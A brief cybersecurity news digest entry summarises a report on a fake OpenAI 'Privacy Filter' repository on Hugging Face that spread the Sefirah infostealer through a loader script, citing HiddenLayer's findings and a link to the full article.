Cyber Security News

Fake OpenAI repository on Hugging Face pushes infostealer malware

BleepingComputer
Fake OpenAI repository on Hugging Face pushes infostealer malware
A malicious Hugging Face repository impersonated OpenAI’s “Privacy Filter” project and used a deceptive loader to deploy the Sefirah infostealer against Windows users. HiddenLayer found the typosquatted Open-OSS/privacy-filter campaign after it reached #1 on Hugging Face, gained 244,000 downloads, and was linked to related infrastructure and an npm typosquatting operation. #OpenAI #HuggingFace #HiddenLayer #OpenOSS #privacyfilter #sefirah #WinOS40

Keypoints

  • A malicious Hugging Face repo impersonated OpenAI’s Privacy Filter project.
  • The typosquatted repository briefly reached #1 and amassed 244,000 downloads.
  • The loader.py script fetched and executed infostealer malware on Windows machines.
  • The final payload, Sefirah, stole browser data, Discord tokens, wallet data, and credentials.
  • HiddenLayer found anti-analysis checks and links to other malicious repositories and WinOS 4.0.

Read More: https://www.bleepingcomputer.com/news/security/fake-openai-repository-on-hugging-face-pushes-infostealer-malware/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint